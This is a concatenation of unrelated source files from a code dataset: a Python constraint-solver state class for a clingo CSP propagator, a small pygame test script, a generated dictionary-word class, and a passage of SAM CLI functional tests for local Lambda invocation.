self.removed_v2cs[:]\n for var, co, cs in lvl.removed_v2cs:\n self.removed_v2cs.append((var, co, state.constraint_state(cs.constraint)))\n\n def __repr__(self):\n return \"{}:l={}/u={}\".format(self.level, self.undo_lower, self.undo_upper)\n\n\nclass State(object):\n \"\"\"\n Class to store and propagate thread-specific state.\n\n Public Members\n ==============\n statistics -- A ThreadStatistics object holding statistics.\n config -- A StateConfig object holding thread specific configuration.\n\n Private Members\n ===============\n _var_state -- List of `VarState` objects.\n _litmap -- Map from order literals to a list of `VarState/value`\n pairs. If there is an order literal for `var<=value`,\n then the pair `(vs,value)` is contained in the map\n where `vs` is the VarState of `var`.\n _levels -- For each decision level propagated, there is a `Level`\n object in this list until `undo` is called.\n _v2cs -- Map from variable names to a list of\n integer/constraint state pairs. 
The meaning of the\n integer depends on the type of constraint.\n _l2c -- Map from literals to a list of constraints. The map\n contains a literal/constraint pair if the literal is\n associated with the constraint.\n _todo -- Set of constraints that have to be propagated on the\n current decision level.\n _facts_integrated -- A tuple of integers storing how many true/false facts\n have already been integrated on the top level.\n _lerp_last -- Offset to speed up `check_full`.\n _trail_offset -- Offset to speed up `simplify`.\n _minimize_bound -- Current bound of the minimize constraint (if any).\n _minimize_level -- The minimize constraint might not have been fully\n propagated below this level. See `update_minimize`.\n _cstate -- A dictionary mapping constraints to their states.\n _udiff, _ldiff -- Changes to upper and lower bounds since the last call\n to check.\n \"\"\"\n def __init__(self, l2c, config):\n \"\"\"\n A newly inititialized state is ready to propagate decision level zero\n after a call to `init_domain`.\n \"\"\"\n self._var_state = []\n self._litmap = {}\n self._levels = [Level(0)]\n self._v2cs = {}\n self._l2c = l2c\n self._todo = TodoList()\n self._facts_integrated = (0, 0)\n self._lerp_last = 0\n self._trail_offset = 0\n self._minimize_bound = None\n self._minimize_level = 0\n self.statistics = ThreadStatistics()\n self._cstate = {}\n self._udiff = OrderedDict()\n self._ldiff = OrderedDict()\n self.config = config\n\n def copy_state(self, master):\n \"\"\"\n Copy order literals and propagation state from the given `master` state\n to the current state.\n \"\"\"\n # pylint: disable=protected-access\n\n # adjust integrated facts\n self._facts_integrated = master._facts_integrated\n\n # make sure we have an empty var state for each variable\n for vs in master._var_state[len(self._var_state):]:\n self.add_variable(vs.min_bound, vs.max_bound)\n for vs, vs_master in zip(self._var_state, master._var_state):\n assert vs.var == vs_master.var\n vs.reset(vs_master.min_bound, vs_master.max_bound)\n\n # copy the map from literals to var states\n self._litmap.clear()\n for lit, vss in master._litmap.items():\n for vs_master, value in vss:\n vs = self.var_state(vs_master.var)\n vs.set_literal(value, lit)\n self._litmap.setdefault(lit, []).append((vs, value))\n\n # copy constraint state\n for c, cs in master._cstate.items():\n self._cstate[c] = cs.copy()\n\n # copy lookup maps\n self._v2cs.clear()\n for var, css in master._v2cs.items():\n self._v2cs[var] = [(co, self.constraint_state(cs.constraint)) for co, cs in css]\n\n # adjust levels\n self._level.copy_state(self, master._level)\n self._ldiff = master._ldiff.copy()\n self._udiff = master._udiff.copy()\n\n # copy todo queues\n for cs in master._todo:\n self._todo.add(self.constraint_state(cs.constraint))\n\n @property\n def minimize_bound(self):\n \"\"\"\n Get the current bound of the minimize constraint.\n \"\"\"\n return self._minimize_bound\n\n def update_minimize(self, constraint, dl, bound):\n \"\"\"\n Updates the bound of the minimize constraint in this state.\n \"\"\"\n if self._minimize_bound is None or bound < self._minimize_bound:\n self._minimize_bound = bound\n self._minimize_level = dl\n self._todo.add(self.constraint_state(constraint))\n elif dl < self._minimize_level:\n self._minimize_level = dl\n self._todo.add(self.constraint_state(constraint))\n\n def get_assignment(self, var_map):\n \"\"\"\n Get the current assignment to all variables.\n\n This function should be called on the state corresponding to the thread\n 
where a model has been found.\n \"\"\"\n return [(var, self._var_state[idx].lower_bound) for var, idx in var_map]\n\n def get_value(self, var):\n \"\"\"\n Get the current value of a variable.\n\n This function should be called on the state corresponding to the thread\n where a model has been found.\n \"\"\"\n assert isinstance(var, int)\n return self._var_state[var].lower_bound\n\n def _push_level(self, level):\n \"\"\"\n Add a new decision level specific state if necessary.\n\n Has to be called in `propagate`.\n \"\"\"\n assert self._levels\n if self._levels[-1].level < level:\n self._levels.append(Level(level))\n\n def _pop_level(self):\n \"\"\"\n Remove the decision level specific states added last.\n\n Has to be called in `undo`.\n \"\"\"\n assert len(self._levels) > 1\n self._levels.pop()\n\n def var_state(self, var):\n \"\"\"\n Get the state associated with variable `var`.\n \"\"\"\n return self._var_state[var]\n\n def constraint_state(self, constraint):\n \"\"\"\n Get the state associated with a constraint.\n \"\"\"\n return self._cstate[constraint]\n\n @property\n def _level(self):\n \"\"\"\n Get the state associated with the current decision level.\n\n Should only be used in `propagate`, `undo`, and `check`. When `check`\n is called, the current decision level can be higher than that of the\n `Level` object returned. Hence, the decision level specific state can\n only be modified for facts because only then changes also apply for\n smaller decision levels.\n \"\"\"\n return self._levels[-1]\n\n def get_literal(self, vs, value, cc):\n \"\"\"\n Returns the literal associated with the `vs.var/value` pair.\n\n Values smaller below the smallest lower bound are associated with the\n false literal and values greater or equal to the largest upper bound\n with the true literal.\n\n This function creates a new literal using `cc` if there is no literal\n for the given value.\n \"\"\"\n if value < vs.min_bound:\n return -TRUE_LIT\n if value >= vs.max_bound:\n return TRUE_LIT\n if not vs.has_literal(value):\n lit = cc.add_literal()\n # Note: By default clasp's heuristic makes literals false. By\n # flipping the literal for non-negative values, assignments close\n # to zero are preferred. 
This way, we might get solutions with\n # small numbers first.\n if value >= 0:\n lit = -lit\n vs.set_literal(value, lit)\n self._litmap.setdefault(lit, []).append((vs, value))\n cc.add_watch(lit)\n cc.add_watch(-lit)\n return vs.get_literal(value)\n\n def _remove_literal(self, vs, lit, value):\n \"\"\"\n Removes order literal `lit` for `vs.var<=value` from `_litmap`.\n \"\"\"\n assert lit not in (TRUE_LIT, -TRUE_LIT)\n vec = self._litmap[lit]\n assert (vs, value) in vec\n vec.remove((vs, value))\n if not vec:\n assert -lit not in self._litmap\n del self._litmap[lit]\n\n def update_literal(self, vs, value, cc, truth):\n \"\"\"\n This function is an extended version of `get_literal` that can update\n an existing order literal for `vs.var/value` if truth is either true or\n false.\n\n The return value is best explained with pseudo code:\n ```\n # literal is not updated\n if truth is None:\n return True, get_literal(vs, value, control)\n lit = TRUE_LIT if truth else -TRUE_LIT\n if value < vs.min_bound:\n old = -TRUE_LIT\n elif value >= vs.max_bound:\n old = TRUE_LIT\n elif vs.has_literal(value):\n old = vs.get_literal(value)\n else:\n old = None\n # literal has not been updated\n if old == lit:\n return True, lit\n # set the new literal\n vs.set_literal(value, lit)\n # fix the old literal and return new literal\n return cc.add_literal([old if truth else -old]), lit\n ```\n\n Additionally, if the the order literal is updated (`old` is not\n `None`), then the replaced value is also removed from `_litmap`.\n \"\"\"\n if truth is None or cc.assignment.decision_level > 0:\n return True, self.get_literal(vs, value, cc)\n lit = TRUE_LIT if truth else -TRUE_LIT\n if value < vs.min_bound or value >= vs.max_bound:\n old = self.get_literal(vs, value, cc)\n if old == lit:\n return True, lit\n return cc.add_clause([old if truth else -old]), lit\n if not vs.has_literal(value):\n vs.set_literal(value, lit)\n self._litmap.setdefault(lit, []).append((vs, value))\n return True, lit\n old = vs.get_literal(value)\n if old == lit:\n return True, lit\n # Note: If a literal is associated with both true and false, then we\n # get a top level conflict making further data structure updates\n # unnecessary.\n if old != -lit:\n vs.set_literal(value, lit)\n self._remove_literal(vs, old, value)\n self._litmap.setdefault(lit, []).append((vs, value))\n return cc.add_clause([old if truth else -old]), lit\n\n # initialization\n def add_variable(self, min_int, max_int):\n \"\"\"\n Adds `VarState` objects for each variable in `variables`.\n \"\"\"\n idx = len(self._var_state)\n self._var_state.append(VarState(idx, min_int, max_int))\n return idx\n\n def add_var_watch(self, var, co, cs):\n \"\"\"\n Watch the given variable `var` notifying the given constraint state\n `cs` on changes.\n\n The integer `co` is additional information passed to the constraint\n state upon notification.\n \"\"\"\n self._v2cs.setdefault(var, []).append((co, cs))\n\n def remove_var_watch(self, var, co, cs):\n \"\"\"\n Removes a previously added variable watch (see `add_var_watch`).\n \"\"\"\n self._v2cs[var].remove((co, cs))\n\n def add_constraint(self, constraint):\n \"\"\"\n Add the given constraint to the propagation queue and initialize its\n state.\n \"\"\"\n if constraint in self._cstate:\n return self._cstate[constraint]\n\n cs = constraint.create_state()\n\n self._cstate[constraint] = cs\n cs.attach(self)\n self._todo.add(cs)\n\n return cs\n\n def remove_constraint(self, constraint):\n \"\"\"\n Remove a constraint from the lookup lists.\n 
\"\"\"\n cs = self._cstate[constraint]\n cs.detach(self)\n if cs in self._level.inactive:\n self._level.inactive.remove(cs)\n if constraint in self._todo:\n self._todo.remove(constraint)\n del self._cstate[constraint]\n\n def translate(self, cc, l2c, stats, config):\n \"\"\"\n Translate constraints in the map l2c and return a list of constraint\n added during translation.\n\n This functions removes translated constraints from the map and the\n state. Constraints added during the translation have to be added to the\n propagator as well.\n \"\"\"\n remove_cs = set()\n added = []\n\n def _translate(constraints, count):\n i = j = 0\n while i < len(constraints):\n i, cs = i+1, self.add_constraint(constraints[i])\n if count:\n stats.num_constraints += 1\n stats.translate_added += 1\n ret, rem = cs.translate(cc, self, config, added)\n if not ret:\n return False\n if rem:\n stats.num_constraints -= 1\n stats.translate_removed += 1\n remove_cs.add(cs)\n continue\n if i-1 != j:\n constraints[i-1], constraints[j] = constraints[j], constraints[i-1]\n j += 1\n del constraints[j:]\n\n for lit in sorted(l2c):\n _translate(l2c[lit], False)\n _translate(added, True)\n\n # Note: Constraints are removed by traversing the whole lookup table to\n # avoid potentially quadratic overhead if a large number of constraints\n # has to be removed.\n if remove_cs:\n remove_vars = []\n for var, css in self._v2cs.items():\n i = remove_if(css, lambda cs: cs[1] in remove_cs)\n del css[i:]\n if not css:\n remove_vars.append(var)\n for var in remove_vars:\n del self._v2cs[var]\n\n # Note: In theory all inactive constraints should be remove on level 0.\n i = remove_if(self._level.inactive, lambda cs: cs in remove_cs)\n del self._level.inactive[i:]\n\n for cs in remove_cs:\n del self._cstate[cs.constraint]\n\n self._todo = TodoList(cs for cs in self._todo if cs not in remove_cs)\n\n return cc.commit(), added\n\n def simplify(self, cc, check_state):\n \"\"\"\n Simplify the state using fixed literals in the trail up to the given\n offset and the enqued constraints in the todo list.\n\n Note that this functions assumes that newly added constraints have been\n enqueued before.\n \"\"\"\n # Note: Propagation won't add anything to the trail because atm\n # there are no order literals which could be propagated. This\n # might change in the multi-shot case when order literals have\n # been added in a previous step which are then implied by the\n # newly added constraints.\n ass = cc.assignment\n trail = ass.trail\n\n # Note: The initial propagation below, will not introduce any order\n # literals other than true or false.\n while True:\n if not cc.propagate():\n return False\n\n trail_offset = len(trail)\n if self._trail_offset == trail_offset and not self._todo:\n return True\n\n if not self.propagate(cc, trail[self._trail_offset:trail_offset]):\n return False\n self._trail_offset = trail_offset\n\n if not self.check(cc, check_state):\n return False\n\n # propagation\n @measure_time_decorator(\"statistics.time_propagate\")\n def propagate(self, cc, changes):\n \"\"\"\n Propagates constraints and order literals.\n\n Constraints that became true are added to the todo list and bounds of\n variables are adjusted according to the truth of order literals.\n \"\"\"\n # Note: This function has to be as fast as possible. In C++ we can try\n # to put all relevant data into the litmap to make the function as\n # cache-friendly as possible. 
Max also noted that it might help to\n # propagate all order literals affected by an assignment and not just\n # the neighboring one to avoid \"rippling\" propagate calls.\n ass = cc.assignment\n\n # open a new decision level if necessary\n self._push_level(ass.decision_level)\n\n # propagate order literals that became true/false\n for lit in changes:\n self._todo.extend(map(self.constraint_state, self._l2c.get(lit, [])))\n if not self._update_domain(cc, lit):\n return False\n\n return True\n\n def _propagate_variable(self, cc, vs, value, lit, sign):\n \"\"\"\n Propagates the preceeding or succeeding order literal of lit.\n\n Whether the target literal is a preceeding or succeeding literal is\n determined by `sign`. The target order literal is given by\n `(vs.var,value)` and must exist.\n\n For example, if `sign==1`, then lit is an order literal for some\n integer value smaller than `value`. The function propagates the clause\n `lit` implies `vs.get_literal(value)`.\n\n Furthermore, if `lit` is a fact, the target literal is simplified to a\n fact, too.\n \"\"\"\n\n ass = cc.assignment\n assert ass.is_true(lit)\n assert vs.has_literal(value)\n\n # get the literal to propagate\n # Note: this explicetly does not use get_literal\n con = sign*vs.get_literal(value)\n\n # on-the-fly simplify\n if ass.is_fixed(lit) and not ass.is_fixed(con):\n ret, con = self.update_literal(vs, value, cc, sign > 0)\n if not ret:\n return False\n con = sign*con\n\n # propagate the literal\n if not ass.is_true(con):\n if not cc.add_clause([-lit, con]):\n return False\n\n return True\n\n def _propagate_variables(self, cc, vs, reason_lit, consequences, sign):\n for value, lit in consequences:\n if cc.assignment.is_true(sign*lit):\n break\n if not self._propagate_variable(cc, vs, value, reason_lit, sign):\n return False\n # Note: Literals might be uppdated on level 0 and the reason_lit is\n # already guaranteed to be a fact on level 0.\n if self.config.propagate_chain and cc.assignment.decision_level > 0:\n reason_lit = sign*lit\n\n return True\n\n def _update_constraints(self, var, diff):\n \"\"\"\n Traverses the lookup tables for constraints removing inactive\n constraints.\n\n The parameters determine whether the lookup tables for lower or upper\n bounds are used.\n \"\"\"\n lvl = self._level\n\n l = self._v2cs.get(var, [])\n i = 0\n for j, (co, cs) in enumerate(l):\n if not cs.removable(lvl.level):\n if cs.update(co, diff):\n self._todo.add(cs)\n if i < j:\n l[i], l[j] = l[j], l[i]\n i += 1\n else:\n lvl.removed_v2cs.append((var, co, cs))\n del l[i:]\n\n def _update_domain(self, cc, lit):\n \"\"\"\n If `lit` is an order literal, this function updates the lower or upper\n bound associated to the variable of the literal (if necessary).\n Furthermore, the preceeding or succeeding order literal is propagated\n if it exists.\n \"\"\"\n ass = cc.assignment\n assert ass.is_true(lit)\n\n lvl = self._level\n\n # update and propagate upper bound\n if lit in self._litmap:\n start = self._facts_integrated[0] if lit == TRUE_LIT else None\n for vs, value in self._litmap[lit][start:]:\n # update upper bound\n if vs.upper_bound > value:\n diff = value - vs.upper_bound\n if ass.decision_level > 0 and lvl.undo_upper.add(vs):\n vs.push_upper()\n vs.upper_bound = value\n self._udiff.setdefault(vs.var, 0)\n self._udiff[vs.var] += diff\n\n # make succeeding literals true\n if not self._propagate_variables(cc, vs, lit, vs.succ_values(value), 1):\n return False\n\n # update and propagate lower bound\n if -lit in self._litmap:\n start = 
self._facts_integrated[1] if lit == TRUE_LIT else None\n            for vs, value in self._litmap[-lit][start:]:\n                # update lower bound\n                if vs.lower_bound < value+1:\n                    diff = value+1-vs.lower_bound\n                    if ass.decision_level > 0 and lvl.undo_lower.add(vs):\n                        vs.push_lower()\n                    vs.lower_bound = value+1\n                    self._ldiff.setdefault(vs.var, 0)\n                    self._ldiff[vs.var] += diff\n\n                # make preceding literals false\n                if not self._propagate_variables(cc, vs, lit, vs.prev_values(value), -1):\n                    return False\n\n        return True\n\n    def mark_inactive(self, cs):\n        \"\"\"\n        Mark the given constraint inactive on the current level.\n        \"\"\"\n        lvl = self._level\n        if cs.tagged_removable and not cs.marked_inactive:\n            cs.marked_inactive = lvl.level\n            lvl.inactive.append(cs)\n\n    def add_dom(self, cc, literal, var, domain):\n        \"\"\"\n        Integrates the given domain for variable var.\n\n        Consider x in {[1,3), [4,6), [7,9)}. We can simply add the binary\n        constraints:\n        - right to left\n          - true => x < 9\n          - x < 7 => x < 6\n          - x < 4 => x < 3\n        - left to right\n          - true => x >= 1\n          - x >= 3 => x >= 4\n          - x >= 6 => x >= 7\n        \"\"\"\n        ass = cc.assignment\n        if ass.is_false(literal):\n            return True\n        if ass.is_true(literal):\n            literal = TRUE_LIT\n        vs = self.var_state(var)\n\n        py = None\n        for x, y in domain:\n            ly = TRUE_LIT if py is None else -self.get_literal(vs, py-1, cc)\n            true = literal == TRUE_LIT and ass.is_true(ly)\n            ret, lx = self.update_literal(vs, x-1, cc, not true and None)\n            if not ret or not cc.add_clause([-literal, -ly, -lx]):\n                return False\n            py = y\n\n        px = None\n        for x, y in reversed(domain):\n            ly = TRUE_LIT if px is None else self.get_literal(vs, px-1, cc)\n            true = literal == TRUE_LIT and ass.is_true(ly)\n            ret, lx = self.update_literal(vs, y-1, cc, true or None)\n            if not ret or not cc.add_clause([-literal, -ly, lx]):\n                return False\n            px = x\n\n        return True\n\n    def add_simple(self, cc, clit, co, var, rhs, strict):\n        \"\"\"\n        This function integrates singleton constraints into the state.\n\n        We explicitly handle the strict case here to avoid introducing\n        unnecessary literals.\n        \"\"\"\n        # pylint: disable=protected-access\n\n        ass = cc.assignment\n\n        # the constraint is never propagated\n        if not strict and ass.is_false(clit):\n            return True\n\n        vs = self.var_state(var)\n\n        if co > 0:\n            truth = ass.value(clit)\n            value = rhs//co\n        else:\n            truth = ass.value(-clit)\n            value = -(rhs//-co)-1\n\n        # in this case we can use the literal of the constraint as order variable\n        if strict and vs.min_bound <= value < vs.max_bound and not vs.has_literal(value):\n            lit = clit\n            if co < 0:\n                lit = -lit\n            if truth is None:\n                cc.add_watch(lit)\n                cc.add_watch(-lit)\n            elif truth:\n                lit = TRUE_LIT\n            else:\n                lit = -TRUE_LIT\n            vs.set_literal(value, lit)\n            self._litmap.setdefault(lit, []).append((vs, value))\n\n        # otherwise we just update the existing order literal\n        else:\n            ret, lit = self.update_literal(vs, value, cc, truth)\n            if not ret:\n                return False\n            if co < 0:\n                lit = -lit\n            if not cc.add_clause([-clit, lit]):\n                return False\n            if strict and not cc.add_clause([-lit, clit]):\n                return False\n\n        return True\n\n    @measure_time_decorator(\"statistics.time_undo\")\n    def undo(self):\n        \"\"\"\n        This function undoes decision level specific state.\n\n        This includes undoing changed bounds of variables and clearing\n        constraints that were not propagated on the current decision level.\n        \"\"\"\n        lvl = self._level\n\n        for vs in lvl.undo_lower:\n            value = vs.lower_bound\n            vs.pop_lower()\n            diff = value - vs.lower_bound - self._ldiff.get(vs.var, 0)\n            if diff != 0:\n                for co, cs 
in self._v2cs.get(vs.var, []):\n cs.undo(co, diff)\n self._ldiff.clear()\n\n for vs in lvl.undo_upper:\n value = vs.upper_bound\n vs.pop_upper()\n diff = value - vs.upper_bound - self._udiff.get(vs.var, 0)\n if diff != 0:\n for co, cs in self._v2cs.get(vs.var, []):\n cs.undo(co, diff)\n self._udiff.clear()\n\n for cs in lvl.inactive:\n cs.mark_active()\n\n for var, co, cs in lvl.removed_v2cs:\n self._v2cs[var].append((co, cs))\n\n self._pop_level()\n # Note: To make sure that the todo list is cleared when there is\n # already a conflict during propagate.\n self._todo.clear()\n\n # checking\n @property\n def _num_facts(self):\n \"\"\"\n The a pair of intergers corresponding to the numbers of order literals\n associated with the true and false literal.\n \"\"\"\n t = len(self._litmap.get(TRUE_LIT, []))\n f = len(self._litmap.get(-TRUE_LIT, []))\n return t, f\n\n @measure_time_decorator(\"statistics.time_check\")\n def check(self, cc, check_state):\n \"\"\"\n This functions propagates facts that have not been integrated on the\n current level and propagates constraints gathered during `propagate`.\n \"\"\"\n ass = cc.assignment\n lvl = self._level\n # Note: Most of the time check has to be called only for levels that\n # have also been propagated. The exception is if a minimize constraint\n # has to be integrated when backtracking from a bound update.\n if ass.decision_level != lvl.level and lvl.level >= self._minimize_level:\n return True\n\n # Note: We have to loop here because watches for the true/false\n # literals do not fire again.\n while True:\n # Note: This integrates any facts that have not been integrated yet\n # on the top level.\n if self._facts_integrated != self._num_facts:\n assert ass.decision_level == 0\n if not self._update_domain(cc, 1):\n return False\n self._facts_integrated = self._num_facts\n\n # update the bounds of the constraints\n for var, diff in self._udiff.items():\n self._update_constraints(var, diff)\n self._udiff.clear()\n for var, diff in self._ldiff.items():\n self._update_constraints(var, diff)\n self._ldiff.clear()\n\n # propagate affected constraints\n todo, self._todo = self._todo, TodoList()\n for cs in todo:\n if not ass.is_false(cs.literal):\n if not cs.propagate(self, cc, self.config, check_state):\n return False\n else:\n self.mark_inactive(cs)\n\n if self._facts_integrated == self._num_facts:\n return True\n\n def check_full(self, control, check_solution):\n \"\"\"\n This function selects a variable that is not fully assigned w.r.t. 
the\n current assignment and introduces an additional order literal for it.\n\n This function should only be called total assignments.\n \"\"\"\n post = range(self._lerp_last, len(self._var_state))\n pre = range(0, self._lerp_last)\n for i in chain(post, pre):\n vs = self._var_state[i]\n if not vs.is_assigned:\n self._lerp_last = i\n value = lerp(vs.lower_bound, vs.upper_bound)\n self.get_literal(vs, value, control)\n return\n\n if check_solution:\n for lit, constraints in self._l2c.items():\n if control.assignment.is_true(lit):\n for c in constraints:\n assert self.constraint_state(c).check_full(self)\n\n # reinitialization\n def update(self, cc):\n \"\"\"\n This function resets a state and should be called when a new solve step\n is started.\n\n This function removes all solve step local variables from the state,\n maps fixed global literals to the true/false literal, and resets the\n minimize constraint.\n \"\"\"\n ass = cc.assignment\n\n self._minimize_bound = None\n self._minimize_level = 0\n\n remove_invalid = []\n remove_fixed = []\n for lit, vss in self._litmap.items():\n if abs(lit) == TRUE_LIT:\n continue\n\n if not ass.has_literal(lit):\n remove_invalid.append((lit, vss))\n elif ass.is_fixed(lit):\n remove_fixed.append((lit, vss))\n\n # remove solve step local variables\n # Note: Iteration order does not matter.\n for lit, vss in remove_invalid:\n for vs, value in vss:\n vs.unset_literal(value)\n del self._litmap[lit]\n\n # Note: Map bounds associated with top level facts to true/false.\n # Because we do not know if the facts have already been propagated, we\n # simply append them and do not touch the counts for integrated facts.\n for old, vss in sorted(remove_fixed):\n for vs, value in vss:\n lit = TRUE_LIT if ass.is_true(old) else -TRUE_LIT\n self._litmap.setdefault(lit, []).append((vs, value))\n vs.set_literal(value, lit)\n del self._litmap[old]\n\n def _cleanup_literals(self, cc, lit, pred):\n \"\"\"\n Remove (var,value) pairs associated with `lit` that match `pred`.\n \"\"\"\n assert lit in (TRUE_LIT, -TRUE_LIT)\n if lit in self._litmap:\n variables = self._litmap[lit]\n\n # adjust the number of facts that have been integrated\n idx = 0 if lit == TRUE_LIT else 1\n nums = list(self._facts_integrated)\n for x in variables[:nums[idx]]:\n if pred(x):\n nums[idx] -= 1\n self._facts_integrated = tuple(nums)\n\n # remove values matching pred\n i = remove_if(variables, pred)\n assert i > 0\n for vs, value in variables[i:]:\n old = vs.get_literal(value)\n if old != lit:\n # Note: This case cannot be triggered if propagation works\n # correctly because facts can only be propagated on level\n # 0. 
But to be on the safe side in view of theory\n                    # extensions, this makes the old literal equal to lit\n                    # before removing the old literal.\n                    if not cc.add_clause([-lit, old], lock=True):\n                        return False\n                    if not cc.add_clause([-old, lit], lock=True):\n                        return False\n                    self._remove_literal(vs, old, value)\n                vs.unset_literal(value)\n            del variables[i:]\n\n        return True\n\n    def cleanup_literals(self, cc):\n        \"\"\"\n        Remove all order literals associated with facts that are above the\n        upper or below the lower bound.\n        \"\"\"\n        # make sure that all top level literals are assigned to the fact literal\n        self.update(cc)\n\n        # cleanup\n        return (self._cleanup_literals(cc, TRUE_LIT, lambda x: x[1] != x[0].upper_bound) and\n                self._cleanup_literals(cc, -TRUE_LIT, lambda x: x[1] != x[0].lower_bound-1))\n\n    def update_bounds(self, cc, other):\n        \"\"\"\n        Integrate the lower and upper bounds from State `other`.\n\n        The function might add clauses via `cc` to fix literals that have to be\n        updated. This can lead to a conflict if states have conflicting\n        lower/upper bounds.\n\n        Precondition: update should be called before this function to really\n        integrate all bounds.\n        \"\"\"\n        # pylint: disable=protected-access\n\n        # update upper bounds\n        for vs_b, _ in other._litmap.get(TRUE_LIT, []):\n            vs_a = self._var_state[vs_b.var]\n            if vs_b.upper_bound < vs_a.upper_bound:\n                ret, _ = self.update_literal(vs_a, vs_b.upper_bound, cc, True)\n                if not ret:\n                    return False\n\n        # update lower bounds\n        for vs_b, _ in other._litmap.get(-TRUE_LIT, []):\n            vs_a = self._var_state[vs_b.var]\n            if vs_a.lower_bound < vs_b.lower_bound:\n                ret, _ = self.update_literal(vs_a, vs_b.lower_bound-1, cc, False)\n                if not ret:\n                    return False\n\n        return self._update_domain(cc, 1)\n","sub_path":"examples/clingo/csp/csp/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":43557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"389877342","text":"from game_test_Chelsie import Game\nimport pygame\n\nrunning = True\n\nwhile running:\n    appl = Game() # instantiate an object of the Game class\n    try:\n        appl.loop()\n    except KeyboardInterrupt: # CTRL-C keyboard interrupt: call appl's destroy() method.\n        appl.destroy()\n\nwhile running:\n    game = Game()\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n            pygame.quit()\n            print(\"Fermeture du jeu\")\n        elif event.type == pygame.KEYDOWN:\n            game.pressed[event.key] = True\n        elif event.type == pygame.KEYUP:\n            game.pressed[event.key] = False\n            #if event.key == pygame.K_RIGHT:\n                #game.tank_tile.move_right()\n            #elif event.key == pygame.K_LEFT:\n                #game.tank_tile.move_left()\n\n\n# player 1\n#if game.pressed.get(pygame.K_q) and game.tank_tile.rect.x > 0:\n    #game.tank_tile.move_left()\n#if game.pressed.get(pygame.K_s):\n    #game.tank_tile.move_down()\n#if game.pressed.get(pygame.K_z):\n    #game.tank_tile.move_up()\n#if game.pressed.get(\n    #pygame.K_d) and game.tank_tile.rect.x + game.tank_tile.rect.width < screen.get_width():\n    #game.tank_tile.move_right()\n#if game.pressed.get(pygame.K_a):\n    #game.tank_tile.angleleft()\n#if game.pressed.get(pygame.K_e):\n    #game.tank_tile.angleright()\n#game.tank_tile.rotate()\n#pygame.display.flip()\n#for event in pygame.event.get():\n    #if event.type == pygame.QUIT:\n        #run = False\n    #elif event.type == pygame.KEYDOWN:\n        #game.pressed[event.key] = True\n    #elif event.type == pygame.KEYUP:\n        #game.pressed[event.key] = 
False\n","sub_path":"tests/main_test_Chelsie.py","file_name":"main_test_Chelsie.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"112963675","text":"\n\n#calss header\nclass _NOSE():\n\tdef __init__(self,): \n\t\tself.name = \"NOSE\"\n\t\tself.definitions = [u'the part of the face that sticks out above the mouth, through which you breathe and smell: ', u'the particular smell of a wine: ', u'the front of a vehicle, especially an aircraft: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_nose.py","file_name":"_nose.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"196634172","text":"import shutil\nimport io\nimport logging\nimport json\nimport random\nimport threading\n\nfrom collections import namedtuple\nfrom timeit import default_timer as timer\nfrom unittest import TestCase\nfrom parameterized import parameterized, param\n\nfrom tests.functional.function_code import nodejs_lambda, make_zip, ECHO_CODE, SLEEP_CODE, GET_ENV_VAR\nfrom samcli.lib.utils.stream_writer import StreamWriter\nfrom samcli.local.docker.manager import ContainerManager\nfrom samcli.local.lambdafn.runtime import LambdaRuntime\nfrom samcli.local.lambdafn.config import FunctionConfig\nfrom samcli.local.layers.layer_downloader import LayerDownloader\nfrom samcli.local.docker.lambda_image import LambdaImage\n\nlogging.basicConfig(level=logging.INFO)\n\nRUNTIME = \"nodejs4.3\"\nHANDLER = \"index.handler\"\nMEMORY = 1024\n\n\nclass TestLambdaRuntime(TestCase):\n\n # Approx Number of seconds it takes to startup a Docker container. 
This helps us measure\n # the approx time that the Lambda Function actually ran for\n CONTAINER_STARTUP_OVERHEAD_SECONDS = 5\n\n def setUp(self):\n self.code_dir = {\n \"echo\": nodejs_lambda(ECHO_CODE),\n \"sleep\": nodejs_lambda(SLEEP_CODE),\n \"envvar\": nodejs_lambda(GET_ENV_VAR)\n }\n\n self.container_manager = ContainerManager()\n layer_downloader = LayerDownloader(\"./\", \"./\")\n self.lambda_image = LambdaImage(layer_downloader, False, False)\n self.runtime = LambdaRuntime(self.container_manager, self.lambda_image)\n\n def tearDown(self):\n for _, dir in self.code_dir.items():\n shutil.rmtree(dir)\n\n def test_echo_function(self):\n timeout = 3\n input_event = '{\"a\":\"b\"}'\n expected_output = b'{\"a\":\"b\"}'\n\n config = FunctionConfig(name=\"helloworld\",\n runtime=RUNTIME,\n handler=HANDLER,\n code_abs_path=self.code_dir[\"echo\"],\n layers=[],\n timeout=timeout)\n\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n self.runtime.invoke(config, input_event, stdout=stdout_stream_writer)\n\n actual_output = stdout_stream.getvalue()\n self.assertEquals(actual_output.strip(), expected_output)\n\n def test_function_timeout(self):\n \"\"\"\n Setup a short timeout and verify that the container is stopped\n \"\"\"\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n timeout = 1 # 1 second timeout\n sleep_seconds = 20 # Ask the function to sleep for 20 seconds\n\n config = FunctionConfig(name=\"sleep_timeout\",\n runtime=RUNTIME,\n handler=HANDLER,\n code_abs_path=self.code_dir[\"sleep\"],\n layers=[],\n timeout=timeout)\n\n # Measure the actual duration of execution\n start = timer()\n self.runtime.invoke(config, str(sleep_seconds), stdout=stdout_stream_writer)\n end = timer()\n\n # Make sure that the wall clock duration is around the ballpark of timeout value\n wall_clock_func_duration = end - start\n print(\"Function completed in {} seconds\".format(wall_clock_func_duration))\n # The function should *not* preemptively stop\n self.assertGreater(wall_clock_func_duration, timeout - 1)\n # The function should not run for much longer than timeout.\n self.assertLess(wall_clock_func_duration, timeout + self.CONTAINER_STARTUP_OVERHEAD_SECONDS)\n\n # There should be no output from the function because timer was interrupted\n actual_output = stdout_stream.getvalue()\n self.assertEquals(actual_output.strip(), b\"\")\n\n 